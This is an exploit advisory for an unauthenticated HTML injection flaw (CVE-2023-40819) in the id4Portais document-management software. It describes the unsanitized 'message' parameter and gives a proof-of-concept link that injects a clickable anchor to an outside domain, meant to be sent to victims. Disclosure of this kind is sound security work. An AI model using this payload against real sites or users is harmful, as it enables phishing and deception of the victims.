# Exploit Title: id4Portais <= V.2022.837.002a - HTML Injection
# Date: 03/08/2024
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://devlop.systems/
# Software Link: https://devlop.systems/software/gestao-documental/
# Version: <= V.2022.837.002a
# Tested on: Google and Firefox latest version
# CVE : CVE-2023-40819

# 1. Description

Unauthenticated users can Inject HTML into message parameter on id4Portais <= V.2022.837.002a since message parameter is unsanitized.

# 2. Proof of Concept (PoC)

To sucefully exploit this attack and attacker need to send the following link to the victim with the payload https://website.com/error?message='"><a href="https://www.yourdomain.com">Clickme!</a>